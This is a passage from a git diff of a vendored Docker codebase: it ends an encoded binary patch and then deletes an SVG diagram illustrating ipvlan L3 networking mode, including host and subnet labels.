zQlY%OmUPhZm-cxT#+eQY-az}idr$wqP#wDz^V$Dr63xj$q4jJ&diFBvP-M@R{#Y^S
zpeh{oAg~f0Jge?>pG_4^#1EeuBTuswLsYekDWh|x0=UyQqzEP?oci}16k0UxbHl3h
z?pe+V!|JPnl*A{(m@!7^EVqp0py&{)@-kH#;Zb?Z(@DN2vu}y6{$!TAk(gyT^Og#B
z`wr8ag5jhwiW#8?s6&y>o^3Kmu@@a=7StDkwX+j?01LIg5PA627<rl{AWFX#E8GR#
zX&YSRnSg6Rp+(a^H>^7Ep5=@%tiBpZNqnCfvqrQ)xzWwjG|=Qqn)&cF$z9^S{JzWk
zygtOc>)O{ulgSEIT!PtXW3x-|6&0188+vC6-}sqN!(1=wP-M3dZT;KB^3g#8)WF)=
zE*kxj=p)0_dYh7mPmPhMIW}#g^0gBeSEUQMQ#P~+CM2BtIR}Ln4WAoUop;YhMi^FK
z4WuLrW2V5#Q9LPo<;s`*X(l$q#a?lxckao*-sZ`F`1gxXUL*vn|I-_`hu2&{L?`X-
z;)?wF-w_kJIuuFtP2CKb;{Y8rKn<*o&lvkFyJPAOG06{~8Y5q`n1QJ19_!f*I$PXn
z8(P$60_wLN6k0TVZdi5RErEhF!?60Q#idZKjM*dF-HnZnJ^Kk!-{<kZKj}dMY#Y{h
z_jqAYm!^yT4*tl;W}yCG%@Ab~2Yx@l8bvUXR*%|rHNf!x9586{r~hj=4haAN000F2
ne{FFFBpv_&000000000$(4un~up*x$00000NkvXXu0mjfxSuby

diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg
deleted file mode 100644
index 6ed1430800..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg
+++ /dev/null
@@ -1 +0,0 @@
-<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="467" height="441.5"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs/><g transform="translate(0,0)"><g><rect fill="#FFFFFF" stroke="none" x="0" y="0" width="467" height="441.5"/></g><g transform="translate(0,0) matrix(1,0,0,1,12,200)"><g><g transform="translate(0,0) scale(4.340000000000001,1.97)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.23041474654377878,0.5076142131979695)"><path fill="#c5e4fc" stroke="none" d="M 10 0 L 424.00000000000006 0 Q 434.00000000000006 0 434.00000000000006 10 L 434.00000000000006 187 Q 434.00000000000006 197 424.00000000000006 197 L 10 197 Q 0 197 0 187 L 0 10 Q 0 0 10 0 Z" opacity="0.93"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 424.00000000000006 0 Q 434.00000000000006 0 434.00000000000006 10 L 434.00000000000006 187 Q 434.00000000000006 197 424.00000000000006 197 L 10 197 Q 0 197 0 187 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" stroke-width="2" opacity="0.93"/></g></g></g></g></g><g transform="matrix(1,0,0,1,265.8711037056154,215.5)"><g transform="translate(0,0)"><g transform="translate(-275,-8.93295288085936) translate(9.128896294384617,-206.56704711914062) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 357 304.5 L 270.3711037056154 220" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,76.5,215.5)"><g transform="translate(0,0)"><g transform="translate(-285,-18.93295288085936) translate(208.5,-196.56704711914062) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 81 304.5 L 184.62889629438467 220" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,10,204)"><g transform="translate(18,0) matrix(1,0,0,1,0,0) translate(-18,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="113" height="16" fill-opacity="0"/></g></g><g transform="translate(18,0) matrix(1,0,0,1,0,0) translate(-18,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="113" height="16" fill-opacity="0"/></g></g><g transform="translate(18,0) matrix(1,0,0,1,0,0) translate(-18,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="18" y="0" width="79" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="18" y="14">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="66" y="14">Host</text></g></g><g transform="matrix(1,0,0,1,223,77.46151194852928)"><g transform="translate(0,0)"><g transform="translate(-10,-28.93295288085936) translate(-213,-48.52855906766992) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 227.5 196 L 229.11774189711457 81.96151194852928" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,57.51435447730654,10.461511948529278)"><g><g transform="translate(0,0) scale(3.4320505881432197,2.464785030240155) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#434343" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,108,55)"><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="259" height="75" fill-opacity="0"/></g></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="259" height="45" fill-opacity="0"/></g></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="29" y="0" width="231" height="45" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="29" y="13">Unless</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="73" y="13">notified</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="118" y="13">about</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="154" y="13">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="176" y="13">container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="14" y="28">networks</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="66" y="28">,</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="73" y="28">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="95" y="28">physical</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="146" y="28">network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="195" y="28">does</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="227" y="28">not</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="47" y="43">have</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="79" y="43">a</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="90" y="43">route</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="123" y="43">to</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="137" y="43">their</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="166" y="43">subnets</text></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="45" width="259" height="15" fill-opacity="0"/></g></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="57" y="45" width="147" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="57" y="58">Who</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="89" y="58">has</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="115" y="58">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="129" y="58">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="133" y="58">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="147" y="58">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="151" y="58">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="165" y="58">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="169" y="58">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="176" y="58">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="180" y="58">24</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="194" y="58">?</text></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="60" width="259" height="15" fill-opacity="0"/></g></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="60" y="60" width="139" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="60" y="73">Who</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="92" y="73">has</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="118" y="73">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="133" y="73">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="136" y="73">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="144" y="73">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="147" y="73">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="162" y="73">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="165" y="73">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="172" y="73">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="176" y="73">24</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="191" y="73">?</text></g></g><g transform="matrix(1,0,0,1,9,404)"><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="439" height="18" fill-opacity="0"/></g></g><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="439" height="18" fill-opacity="0"/></g></g><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="431" height="17" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="4" y="15">Containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="86" y="15">can</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="116" y="15">be</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="139" y="15">on</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="161" y="15">different</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="223" y="15">subnets</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="284" y="15">and</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="315" y="15">reach</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="359" y="15">each</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="398" y="15">other</text></g></g><g transform="matrix(1,0,0,1,108,253)"><g transform="translate(153,0) matrix(1,0,0,1,0,0) translate(-153,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="235" height="22" fill-opacity="0"/></g></g><g transform="translate(153,0) matrix(1,0,0,1,0,0) translate(-153,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="235" height="22" fill-opacity="0"/></g></g><g transform="translate(153,0) matrix(1,0,0,1,0,0) translate(-153,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="42" y="0" width="70" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="48" y="19">Ipvlan</text></g><g transform="translate(153,0) matrix(1,0,0,1,0,0) translate(-153,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="111" y="0" width="82" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="111" y="19">L3</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="140" y="19">Mode</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,124,172)"><g transform="translate(4,4) scale(1.002415458937198,1.0104166666666667)"><g><g transform="translate(0,0) scale(2.07,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.48309178743961356,2.0833333333333335)"><path fill="#000000" stroke="none" d="M 10 0 L 196.99999999999997 0 Q 206.99999999999997 0 206.99999999999997 10 L 206.99999999999997 38 Q 206.99999999999997 48 196.99999999999997 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 196.99999999999997 0 Q 206.99999999999997 0 206.99999999999997 10 L 206.99999999999997 38 Q 206.99999999999997 48 196.99999999999997 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(2.07,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.48309178743961356,2.0833333333333335)"><path fill="#cccccc" stroke="none" d="M 10 0 L 196.99999999999997 0 Q 206.99999999999997 0 206.99999999999997 10 L 206.99999999999997 38 Q 206.99999999999997 48 196.99999999999997 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 196.99999999999997 0 Q 206.99999999999997 0 206.99999999999997 10 L 206.99999999999997 38 Q 206.99999999999997 48 196.99999999999997 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,136,175)"><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="185" height="42" fill-opacity="0"/></g></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="185" height="14" fill-opacity="0"/></g></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="79" y="0" width="27" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="79" y="12">Eth0</text></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="185" height="14" fill-opacity="0"/></g></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="46" y="14" width="95" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="46" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="66" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="69" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="89" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="92" y="26">50</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="106" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="109" y="26">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="122" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="126" y="26">24</text></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="185" height="14" fill-opacity="0"/></g></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="3" y="28" width="179" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="3" y="40">Parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="42" y="40">interface</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="40">acts</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="117" y="40">as</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="133" y="40">a</text></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="143" y="28" width="40" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="143" y="40">Router</text></g></g><g transform="matrix(1,0,0,1,31,358)"><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="388" height="32" fill-opacity="0"/></g></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="388" height="16" fill-opacity="0"/></g></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="30" y="0" width="328" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="30" y="14">All</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="50" y="14">containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="118" y="14">can</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="145" y="14">ping</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="175" y="14">each</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="209" y="14">other</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="299" y="14">a</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="310" y="14">router</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="351" y="14">if</text></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="245" y="0" width="50" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="245" y="14">without</text></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="388" height="16" fill-opacity="0"/></g></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="31" y="16" width="328" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="31" y="30">they</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="61" y="30">share</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="100" y="30">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="163" y="30">parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="206" y="30">interface</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="260" y="30"> (</text></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="123" y="16" width="36" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="123" y="30">same</text></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="269" y="16" width="90" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="269" y="30">example</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="326" y="30">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="353" y="30">)</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,320,296)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,310,286)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g 